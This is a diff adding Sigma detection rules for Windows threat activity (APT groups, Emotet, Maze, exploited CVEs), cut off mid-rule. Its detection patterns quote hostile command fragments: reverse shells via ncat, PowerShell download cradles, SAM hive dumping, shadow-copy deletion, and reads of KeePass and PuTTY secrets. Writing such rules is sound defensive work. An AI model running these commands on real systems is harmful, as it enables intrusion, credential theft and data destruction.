process_creation + product: windows + definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697 +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + CommandLine|contains: + - checkadmin.exe 127.0.0.1 -all + - netsh advfirewall firewall add rule name=powershell dir=in + - cmd /c powershell.exe -ep bypass -file c:\s.ps1 + - /tn win32times /f + - create win32times binPath= + - \c$\windows\system32\devmgr.dll + - ' -exec bypass -enc JgAg' + - type *keepass\KeePass.config.xml + - iie.exe iie.txt + - reg query HKEY_CURRENT_USER\Software\\*\PuTTY\Sessions\ + condition: process_creation and selection +falsepositives: + - Administrators that use checkadmin.exe tool to enumerate local administrators +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2019/TA/Operation-Wocao/win_security_apt_wocao.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/TA/Operation-Wocao/win_security_apt_wocao.yml new file mode 100644 index 000000000..9c204d2d9 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/TA/Operation-Wocao/win_security_apt_wocao.yml @@ -0,0 +1,36 @@ +title: Operation Wocao Activity - Security +id: 74ad4314-482e-4c3e-b237-3f7ed3b9ca8d +status: test +description: Detects activity mentioned in Operation Wocao report +references: + - https://web.archive.org/web/20200226212615/https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/ + - https://web.archive.org/web/20200226212615/https://resources.fox-it.com/rs/170-CAK-271/images/201912_Report_Operation_Wocao.pdf + - https://twitter.com/SBousseaden/status/1207671369963646976 +author: Florian Roth (Nextron Systems), frack113 +date: 2019/12/20 +modified: 2022/11/27 +tags: + - attack.discovery + - attack.t1012 + - attack.defense_evasion + - attack.t1036.004 + - attack.t1027 + - attack.execution + - attack.t1053.005 + - attack.t1059.001 + - detection.emerging_threats +logsource: + product: windows + service: security +detection: + security: + Channel: Security + selection: + EventID: 4799 + TargetUserName|startswith: Administr + CallerProcessName|endswith: \checkadmin.exe + condition: security and selection +falsepositives: + - Administrators that use checkadmin.exe tool to enumerate local administrators +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2020/Exploits/CVE-2020-0688/win_vul_cve_2020_0688.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/Exploits/CVE-2020-0688/win_vul_cve_2020_0688.yml new file mode 100644 index 000000000..243fcc6f3 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/Exploits/CVE-2020-0688/win_vul_cve_2020_0688.yml @@ -0,0 +1,32 @@ +title: CVE-2020-0688 Exploitation via Eventlog +id: d6266bf5-935e-4661-b477-78772735a7cb +status: test +description: Detects the exploitation of Microsoft Exchange vulnerability as described in CVE-2020-0688 +references: + - https://www.trustedsec.com/blog/detecting-cve-20200688-remote-code-execution-vulnerability-on-microsoft-exchange-server/ + - https://cyberpolygon.com/materials/okhota-na-ataki-ms-exchange-chast-2-cve-2020-0688-cve-2020-16875-cve-2021-24085/ +author: Florian Roth (Nextron Systems), wagga +date: 2020/02/29 +modified: 2022/12/25 +tags: + - attack.initial_access + - attack.t1190 + - cve.2020.0688 + - detection.emerging_threats +logsource: + product: windows + service: application +detection: + application: + Channel: Application + selection1: + EventID: 4 + Provider_Name: MSExchange Control Panel + Level: Error + selection2: + - '&__VIEWSTATE=' + condition: application and (all of selection*) +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2020/Exploits/CVE-2020-10189/proc_creation_win_exploit_cve_2020_10189.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/Exploits/CVE-2020-10189/proc_creation_win_exploit_cve_2020_10189.yml new file mode 100644 index 000000000..c3010eb88 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/Exploits/CVE-2020-10189/proc_creation_win_exploit_cve_2020_10189.yml @@ -0,0 +1,43 @@ +title: Exploited CVE-2020-10189 Zoho ManageEngine +id: 846b866e-2a57-46ee-8e16-85fa92759be7 +status: test +description: Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189 +references: + - https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html + - https://vulmon.com/exploitdetails?qidtp=exploitdb&qid=48224 +author: Florian Roth (Nextron Systems) +date: 2020/03/25 +modified: 2023/01/21 +tags: + - attack.initial_access + - attack.t1190 + - attack.execution + - attack.t1059.001 + - attack.t1059.003 + - attack.s0190 + - cve.2020.10189 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + ParentProcessName|endswith: DesktopCentral_Server\jre\bin\java.exe + NewProcessName|endswith: + - \cmd.exe + - \powershell.exe + - \pwsh.exe + - \bitsadmin.exe + - \systeminfo.exe + - \net.exe + - \net1.exe + - \reg.exe + - \query.exe + condition: process_creation and selection +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2020/Exploits/CVE-2020-1048/proc_creation_win_exploit_cve_2020_1048.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/Exploits/CVE-2020-1048/proc_creation_win_exploit_cve_2020_1048.yml new file mode 100644 index 000000000..90104f0f8 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/Exploits/CVE-2020-1048/proc_creation_win_exploit_cve_2020_1048.yml @@ -0,0 +1,36 @@ +title: Suspicious PrinterPorts Creation (CVE-2020-1048) +id: cc08d590-8b90-413a-aff6-31d1a99678d7 +status: test +description: Detects new commands that add new printer port which point to suspicious file +references: + - https://windows-internals.com/printdemon-cve-2020-1048/ +author: EagleEye Team, Florian Roth +date: 2020/05/13 +modified: 2021/11/27 +tags: + - attack.persistence + - attack.execution + - attack.t1059.001 + - cve.2020.1048 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection1: + CommandLine|contains: Add-PrinterPort -Name + selection2: + CommandLine|contains: + - .exe + - .dll + - .bat + selection3: + CommandLine|contains: Generic / Text Only + condition: process_creation and ((selection1 and selection2) or selection3) +falsepositives: + - New printer port install on host +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2020/Exploits/CVE-2020-1350/proc_creation_win_exploit_cve_2020_1350.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/Exploits/CVE-2020-1350/proc_creation_win_exploit_cve_2020_1350.yml new file mode 100644 index 000000000..cb7a47f54 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/Exploits/CVE-2020-1350/proc_creation_win_exploit_cve_2020_1350.yml @@ -0,0 +1,37 @@ +title: DNS RCE CVE-2020-1350 +id: b5281f31-f9cc-4d0d-95d0-45b91c45b487 +status: test +description: Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process +references: + - https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/ + - https://blog.menasec.net/2019/02/threat-hunting-24-microsoft-windows-dns.html +author: Florian Roth (Nextron Systems) +date: 2020/07/15 +modified: 2022/07/12 +tags: + - attack.initial_access + - attack.t1190 + - attack.execution + - attack.t1569.002 + - cve.2020.1350 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + ParentProcessName|endswith: \System32\dns.exe + filter: + NewProcessName|endswith: + - \System32\werfault.exe + - \System32\conhost.exe + - \System32\dnscmd.exe + - \System32\dns.exe + condition: process_creation and (selection and not filter) +falsepositives: + - Unknown but benign sub processes of the Windows DNS service dns.exe +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2020/Malware/Blue-Mockingbird/proc_creation_win_malware_blue_mockingbird.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/Malware/Blue-Mockingbird/proc_creation_win_malware_blue_mockingbird.yml new file mode 100644 index 000000000..5b83188eb --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/Malware/Blue-Mockingbird/proc_creation_win_malware_blue_mockingbird.yml @@ -0,0 +1,37 @@ +title: Blue Mockingbird +id: c3198a27-23a0-4c2c-af19-e5328d49680e +related: + - id: ce239692-aa94-41b3-b32f-9cab259c96ea + type: merged +status: test +description: Attempts to detect system changes made by Blue Mockingbird +references: + - https://redcanary.com/blog/blue-mockingbird-cryptominer/ +author: Trent Liffick (@tliffick) +date: 2020/05/14 +modified: 2022/10/09 +tags: + - attack.execution + - attack.t1112 + - attack.t1047 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + sc_cmd: + CommandLine|contains|all: + - sc config + - wercplsupporte.dll + NewProcessName|endswith: \cmd.exe + wmic_cmd: + CommandLine|endswith: COR_PROFILER + NewProcessName|endswith: \wmic.exe + condition: process_creation and (sc_cmd or wmic_cmd) +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2020/Malware/Emotet/proc_creation_win_malware_emotet_rundll32_execution.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/Malware/Emotet/proc_creation_win_malware_emotet_rundll32_execution.yml new file mode 100644 index 000000000..45ea2cd02 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/Malware/Emotet/proc_creation_win_malware_emotet_rundll32_execution.yml @@ -0,0 +1,41 @@ +title: Potential Emotet Rundll32 Execution +id: 54e57ce3-0672-46eb-a402-2c0948d5e3e9 +status: test +description: Detecting Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL +references: + - https://paste.cryptolaemus.com/emotet/2020/12/22/emotet-malware-IoCs_12-22-20.html + - https://cyber.wtf/2021/11/15/guess-whos-back/ +author: FPT.EagleEye +date: 2020/12/25 +modified: 2023/02/21 +tags: + - attack.defense_evasion + - attack.t1218.011 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_img: + - NewProcessName|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE + selection_cli: + CommandLine|endswith: + - ',RunDLL' + - ',Control_RunDLL' + # - ',#1' too generic - function load by ordinal is not Emotet specific + filter_legitimate_dll: + CommandLine|endswith: + - .dll,Control_RunDLL + - .dll",Control_RunDLL + - .dll',Control_RunDLL + filter_ide: + ParentProcessName|endswith: \tracker.exe + condition: process_creation and (all of selection_* and not 1 of filter_*) +falsepositives: + - Unknown +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2020/Malware/Ke3chang-TidePool/proc_creation_win_malware_ke3chang_tidepool.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/Malware/Ke3chang-TidePool/proc_creation_win_malware_ke3chang_tidepool.yml new file mode 100644 index 000000000..4879d7db9 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/Malware/Ke3chang-TidePool/proc_creation_win_malware_ke3chang_tidepool.yml @@ -0,0 +1,37 @@ +title: Potential Ke3chang/TidePool Malware Activity +id: 7b544661-69fc-419f-9a59-82ccc328f205 +status: test +description: Detects registry modifications potentially related to the Ke3chang/TidePool malware as seen in campaigns running in 2019 and 2020 +references: + - https://web.archive.org/web/20200618080300/https://www.verfassungsschutz.de/embed/broschuere-2020-06-bfv-cyber-brief-2020-01.pdf + - https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/ +author: Markus Neis, Swisscom +date: 2020/06/18 +modified: 2023/03/10 +tags: + - attack.g0004 + - attack.defense_evasion + - attack.t1562.001 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + # Ke3chang and TidePool both modify the IEHarden registry key, as well as the following list of keys. + # Setting these registry keys is unique to the Ke3chang and TidePool malware families. + # HKCU\Software\Microsoft\Internet Explorer\Main\Check_Associations + # HKCU\Software\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize + # HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IEharden + CommandLine|contains: + - -Property DWORD -name DisableFirstRunCustomize -value 2 -Force + - -Property String -name Check_Associations -value + - -Property DWORD -name IEHarden -value 0 -Force + condition: process_creation and selection +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2020/Malware/Maze/proc_creation_win_malware_maze_ransomware.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/Malware/Maze/proc_creation_win_malware_maze_ransomware.yml new file mode 100644 index 000000000..1175563a7 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/Malware/Maze/proc_creation_win_malware_maze_ransomware.yml @@ -0,0 +1,46 @@ +title: Potential Maze Ransomware Activity +id: 29fd07fc-9cfd-4331-b7fd-cc18dfa21052 +status: test +description: Detects specific process characteristics of Maze ransomware word document droppers +references: + - https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html + - https://app.any.run/tasks/51e7185c-52d7-4efb-ac0d-e86340053473/ + - https://app.any.run/tasks/65a79440-373a-4725-8d74-77db9f2abda4/ +author: Florian Roth (Nextron Systems) +date: 2020/05/08 +modified: 2023/02/13 +tags: + - attack.execution + - attack.t1204.002 + - attack.t1047 + - attack.impact + - attack.t1490 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + # Dropper + process_creation: + EventID: 4688 + Channel: Security + selection1: + ParentProcessName|endswith: \WINWORD.exe + NewProcessName|endswith: .tmp + selection2: + CommandLine|endswith: shadowcopy delete + # Specific Pattern + NewProcessName|endswith: \wmic.exe + ParentProcessName|contains: \Temp\ + selection3: + CommandLine|endswith: shadowcopy delete + CommandLine|contains: \..\..\system32 + condition: process_creation and (1 of selection*) +fields: + - SubjectUserName + - NewProcessName + - ComputerName +falsepositives: + - Unlikely +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/Evilnum/proc_creation_win_apt_evilnum_jul20.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/Evilnum/proc_creation_win_apt_evilnum_jul20.yml new file mode 100644 index 000000000..bd10990aa --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/Evilnum/proc_creation_win_apt_evilnum_jul20.yml @@ -0,0 +1,33 @@ +title: EvilNum APT Golden Chickens Deployment Via OCX Files +id: 8acf3cfa-1e8c-4099-83de-a0c4038e18f0 +status: test +description: Detects Golden Chickens deployment method as used by Evilnum and described in ESET July 2020 report +references: + - https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/ + - https://app.any.run/tasks/33d37fdf-158d-4930-aa68-813e1d5eb8ba/ +author: Florian Roth (Nextron Systems) +date: 2020/07/10 +modified: 2023/03/09 +tags: + - attack.defense_evasion + - attack.t1218.011 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + CommandLine|contains|all: + - regsvr32 + - /s + - /i + - \AppData\Roaming\ + - .ocx + condition: process_creation and selection +falsepositives: + - Unknown +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/GALLIUM/proc_creation_win_apt_gallium_iocs.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/GALLIUM/proc_creation_win_apt_gallium_iocs.yml new file mode 100644 index 000000000..0d71c46b8 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/GALLIUM/proc_creation_win_apt_gallium_iocs.yml @@ -0,0 +1,110 @@ +title: GALLIUM IOCs +id: 440a56bf-7873-4439-940a-1c8a671073c2 +status: test +description: Detects artifacts associated with GALLIUM cyber espionage group as reported by Microsoft Threat Intelligence Center in the December 2019 report. +references: + - https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/ + - https://github.com/Azure/Azure-Sentinel/blob/a02ce85c96f162de6f8cc06f07a53b6525f0ff7f/Solutions/Legacy%20IOC%20based%20Threat%20Protection/Analytic%20Rules/GalliumIOCs.yaml +author: Tim Burrell +date: 2020/02/07 +modified: 2023/03/09 +tags: + - attack.credential_access + - attack.command_and_control + - attack.t1212 + - attack.t1071 + - attack.g0093 + - detection.emerging_threats +logsource: + product: windows + category: process_creation +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_sysmon: + Hashes|contains: + - SHA256=9ae7c4a4e1cfe9b505c3a47e66551eb1357affee65bfefb0109d02f4e97c06dd + - SHA256=7772d624e1aed327abcd24ce2068063da0e31bb1d5d3bf2841fc977e198c6c5b + - SHA256=657fc7e6447e0065d488a7db2caab13071e44741875044f9024ca843fe4e86b5 + - SHA256=2ef157a97e28574356e1d871abf75deca7d7a1ea662f38b577a06dd039dbae29 + - SHA256=52fd7b90d7144ac448af4008be639d4d45c252e51823f4311011af3207a5fc77 + - SHA256=a370e47cb97b35f1ae6590d14ada7561d22b4a73be0cb6df7e851d85054b1ac3 + - SHA256=5bf80b871278a29f356bd42af1e35428aead20cd90b0c7642247afcaaa95b022 + - SHA256=6f690ccfd54c2b02f0c3cb89c938162c10cbeee693286e809579c540b07ed883 + - SHA256=3c884f776fbd16597c072afd81029e8764dd57ee79d798829ca111f5e170bd8e + - SHA256=1922a419f57afb351b58330ed456143cc8de8b3ebcbd236d26a219b03b3464d7 + - SHA256=fe0e4ef832b62d49b43433e10c47dc51072959af93963c790892efc20ec422f1 + - SHA256=7ce9e1c5562c8a5c93878629a47fe6071a35d604ed57a8f918f3eadf82c11a9c + - SHA256=178d5ee8c04401d332af331087a80fb4e5e2937edfba7266f9be34a5029b6945 + - SHA256=51f70956fa8c487784fd21ab795f6ba2199b5c2d346acdeef1de0318a4c729d9 + - SHA256=889bca95f1a69e94aaade1e959ed0d3620531dc0fc563be9a8decf41899b4d79 + - SHA256=332ddaa00e2eb862742cb8d7e24ce52a5d38ffb22f6c8bd51162bd35e84d7ddf + - SHA256=44bcf82fa536318622798504e8369e9dcdb32686b95fcb44579f0b4efa79df08 + - SHA256=63552772fdd8c947712a2cff00dfe25c7a34133716784b6d486227384f8cf3ef + - SHA256=056744a3c371b5938d63c396fe094afce8fb153796a65afa5103e1bffd7ca070 + - SHA1=53a44c2396d15c3a03723fa5e5db54cafd527635 + - SHA1=9c5e496921e3bc882dc40694f1dcc3746a75db19 + - SHA1=aeb573accfd95758550cf30bf04f389a92922844 + - SHA1=79ef78a797403a4ed1a616c68e07fff868a8650a + - SHA1=4f6f38b4cec35e895d91c052b1f5a83d665c2196 + - SHA1=1e8c2cac2e4ce7cbd33c3858eb2e24531cb8a84d + - SHA1=e841a63e47361a572db9a7334af459ddca11347a + - SHA1=c28f606df28a9bc8df75a4d5e5837fc5522dd34d + - SHA1=2e94b305d6812a9f96e6781c888e48c7fb157b6b + - SHA1=dd44133716b8a241957b912fa6a02efde3ce3025 + - SHA1=8793bf166cb89eb55f0593404e4e933ab605e803 + - SHA1=a39b57032dbb2335499a51e13470a7cd5d86b138 + - SHA1=41cc2b15c662bc001c0eb92f6cc222934f0beeea + - SHA1=d209430d6af54792371174e70e27dd11d3def7a7 + - SHA1=1c6452026c56efd2c94cea7e0f671eb55515edb0 + - SHA1=c6b41d3afdcdcaf9f442bbe772f5da871801fd5a + - SHA1=4923d460e22fbbf165bbbaba168e5a46b8157d9f + - SHA1=f201504bd96e81d0d350c3a8332593ee1c9e09de + - SHA1=ddd2db1127632a2a52943a2fe516a2e7d05d70d2 + selection_hashes: + - sha256: + - 9ae7c4a4e1cfe9b505c3a47e66551eb1357affee65bfefb0109d02f4e97c06dd + - 7772d624e1aed327abcd24ce2068063da0e31bb1d5d3bf2841fc977e198c6c5b + - 657fc7e6447e0065d488a7db2caab13071e44741875044f9024ca843fe4e86b5 + - 2ef157a97e28574356e1d871abf75deca7d7a1ea662f38b577a06dd039dbae29 + - 52fd7b90d7144ac448af4008be639d4d45c252e51823f4311011af3207a5fc77 + - a370e47cb97b35f1ae6590d14ada7561d22b4a73be0cb6df7e851d85054b1ac3 + - 5bf80b871278a29f356bd42af1e35428aead20cd90b0c7642247afcaaa95b022 + - 6f690ccfd54c2b02f0c3cb89c938162c10cbeee693286e809579c540b07ed883 + - 3c884f776fbd16597c072afd81029e8764dd57ee79d798829ca111f5e170bd8e + - 1922a419f57afb351b58330ed456143cc8de8b3ebcbd236d26a219b03b3464d7 + - fe0e4ef832b62d49b43433e10c47dc51072959af93963c790892efc20ec422f1 + - 7ce9e1c5562c8a5c93878629a47fe6071a35d604ed57a8f918f3eadf82c11a9c + - 178d5ee8c04401d332af331087a80fb4e5e2937edfba7266f9be34a5029b6945 + - 51f70956fa8c487784fd21ab795f6ba2199b5c2d346acdeef1de0318a4c729d9 + - 889bca95f1a69e94aaade1e959ed0d3620531dc0fc563be9a8decf41899b4d79 + - 332ddaa00e2eb862742cb8d7e24ce52a5d38ffb22f6c8bd51162bd35e84d7ddf + - 44bcf82fa536318622798504e8369e9dcdb32686b95fcb44579f0b4efa79df08 + - 63552772fdd8c947712a2cff00dfe25c7a34133716784b6d486227384f8cf3ef + - 056744a3c371b5938d63c396fe094afce8fb153796a65afa5103e1bffd7ca070 + - sha1: + - 53a44c2396d15c3a03723fa5e5db54cafd527635 + - 9c5e496921e3bc882dc40694f1dcc3746a75db19 + - aeb573accfd95758550cf30bf04f389a92922844 + - 79ef78a797403a4ed1a616c68e07fff868a8650a + - 4f6f38b4cec35e895d91c052b1f5a83d665c2196 + - 1e8c2cac2e4ce7cbd33c3858eb2e24531cb8a84d + - e841a63e47361a572db9a7334af459ddca11347a + - c28f606df28a9bc8df75a4d5e5837fc5522dd34d + - 2e94b305d6812a9f96e6781c888e48c7fb157b6b + - dd44133716b8a241957b912fa6a02efde3ce3025 + - 8793bf166cb89eb55f0593404e4e933ab605e803 + - a39b57032dbb2335499a51e13470a7cd5d86b138 + - 41cc2b15c662bc001c0eb92f6cc222934f0beeea + - d209430d6af54792371174e70e27dd11d3def7a7 + - 1c6452026c56efd2c94cea7e0f671eb55515edb0 + - c6b41d3afdcdcaf9f442bbe772f5da871801fd5a + - 4923d460e22fbbf165bbbaba168e5a46b8157d9f + - f201504bd96e81d0d350c3a8332593ee1c9e09de + - ddd2db1127632a2a52943a2fe516a2e7d05d70d2 + condition: process_creation and (1 of selection_*) +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/GALLIUM/win_dns_analytic_apt_gallium.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/GALLIUM/win_dns_analytic_apt_gallium.yml new file mode 100644 index 000000000..3d9a4471d --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/GALLIUM/win_dns_analytic_apt_gallium.yml @@ -0,0 +1,40 @@ +title: GALLIUM Artefacts - Builtin +id: 3db10f25-2527-4b79-8d4b-471eb900ee29 +related: + - id: 440a56bf-7873-4439-940a-1c8a671073c2 + type: derived +status: test +description: Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019. +references: + - https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/ + - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11) +author: Tim Burrell +date: 2020/02/07 +modified: 2023/01/02 +tags: + - attack.credential_access + - attack.command_and_control + - attack.t1071 + - detection.emerging_threats +logsource: + product: windows + service: dns-server-analytic + definition: 'Requirements: Microsoft-Windows-DNS-Server/Analytical ({EB79061A-A566-4698-9119-3ED2807060E7}) Event Log must be collected in order to receive the events.' +detection: + dns_server_analytic: + Channel: Microsoft-Windows-DNS-Server/Analytical + selection: + EventID: 257 + QNAME: + - asyspy256.ddns.net + - hotkillmail9sddcc.ddns.net + - rosaf112.ddns.net + - cvdfhjh1231.myftp.biz + - sz2016rose.ddns.net + - dffwescwer4325.myftp.biz + - cvdfhjh1231.ddns.net + condition: dns_server_analytic and selection +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/Greenbug/proc_creation_win_apt_greenbug_may20.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/Greenbug/proc_creation_win_apt_greenbug_may20.yml new file mode 100644 index 000000000..0c0730e8d --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/Greenbug/proc_creation_win_apt_greenbug_may20.yml @@ -0,0 +1,56 @@ +title: Greenbug Espionage Group Indicators +id: 3711eee4-a808-4849-8a14-faf733da3612 +status: test +description: Detects tools and process executions used by Greenbug in their May 2020 campaign as reported by Symantec +references: + - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia +author: Florian Roth (Nextron Systems) +date: 2020/05/20 +modified: 2023/03/09 +tags: + - attack.g0049 + - attack.execution + - attack.t1059.001 + - attack.command_and_control + - attack.t1105 + - attack.defense_evasion + - attack.t1036.005 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_img: + NewProcessName|endswith: + - :\ProgramData\adobe\Adobe.exe + - :\ProgramData\oracle\local.exe + - \revshell.exe + - \infopagesbackup\ncat.exe + - :\ProgramData\comms\comms.exe + selection_msf: + CommandLine|contains|all: + - -ExecutionPolicy Bypass -File + - \msf.ps1 + selection_ncat: + CommandLine|contains|all: + - infopagesbackup + - \ncat + - -e cmd.exe + selection_powershell: + CommandLine|contains: + - system.Data.SqlClient.SqlDataAdapter($cmd); [void]$da.fill + - -nop -w hidden -c $k=new-object + - '[Net.CredentialCache]::DefaultCredentials;IEX ' + - ' -nop -w hidden -c $m=new-object net.webclient;$m' + - -noninteractive -executionpolicy bypass whoami + - -noninteractive -executionpolicy bypass netstat -a + selection_other: + CommandLine|contains: L3NlcnZlcj1 # base64 encoded '/server=' + condition: process_creation and (1 of selection_*) +falsepositives: + - Unlikely +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/Lazarus/proc_creation_win_apt_lazarus_group_activity.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/Lazarus/proc_creation_win_apt_lazarus_group_activity.yml new file mode 100644 index 000000000..8682aeb67 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/Lazarus/proc_creation_win_apt_lazarus_group_activity.yml @@ -0,0 +1,64 @@ +title: Lazarus Group Activity +id: 24c4d154-05a4-4b99-b57d-9b977472443a +related: + - id: 7b49c990-4a9a-4e65-ba95-47c9cc448f6e + type: obsoletes +status: test +description: Detects different process execution behaviors as described in various threat reports on Lazarus group activity +references: + - https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/ + - https://www.hvs-consulting.de/lazarus-report/ +author: Florian Roth (Nextron Systems), wagga +date: 2020/12/23 +modified: 2023/03/10 +tags: + - attack.g0032 + - attack.execution + - attack.t1059 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_generic: + CommandLine|contains: + - reg.exe save hklm\sam %temp%\~reg_sam.save + - 1q2w3e4r@#$@#$@#$ + - ' -hp1q2w3e4 ' + - '.dat data03 10000 -p ' + selection_netstat: + CommandLine|contains|all: + - 'netstat -aon | find ' + - ESTA + - ' > %temp%\~' + # Network share discovery + selection_network_discovery: + CommandLine|contains|all: + - .255 10 C:\ProgramData\IBM\ + - .DAT + selection_persistence: + CommandLine|contains|all: + - ' /c ' + - ' -p 0x' + CommandLine|contains: + - C:\ProgramData\ + - C:\RECYCLER\ + selection_rundll32: + CommandLine|contains|all: + - 'rundll32 ' + - C:\ProgramData\ + CommandLine|contains: + - .bin, + - .tmp, + - .dat, + - .io, + - .ini, + - .db, + condition: process_creation and (1 of selection_*) +falsepositives: + - Unlikely +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_cmds.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_cmds.yml new file mode 100644 index 000000000..460e604ce --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_cmds.yml @@ -0,0 +1,60 @@ +title: UNC2452 Process Creation Patterns +id: 9be34ad0-b6a7-4fbd-91cf-fc7ec1047f5f +status: test +description: Detects a specific process creation patterns as seen used by UNC2452 and provided by Microsoft as Microsoft Defender ATP queries +references: + - https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/ +author: Florian Roth (Nextron Systems) +date: 2021/01/22 +modified: 2023/09/12 +tags: + - attack.execution + - attack.t1059.001 + - detection.emerging_threats + # - sunburst + # - unc2452 +logsource: + category: process_creation + product: windows +detection: + # To avoid writing complex condition. "selection_generic_1" and "selection_generic_2" are the same except for the extension used. + process_creation: + EventID: 4688 + Channel: Security + selection_generic_1: + CommandLine|contains: + - 7z.exe a -v500m -mx9 -r0 -p + - 7z.exe a -mx9 -r0 -p + CommandLine|contains|all: + - .zip + - .txt + selection_generic_2: + CommandLine|contains: + - 7z.exe a -v500m -mx9 -r0 -p + - 7z.exe a -mx9 -r0 -p + 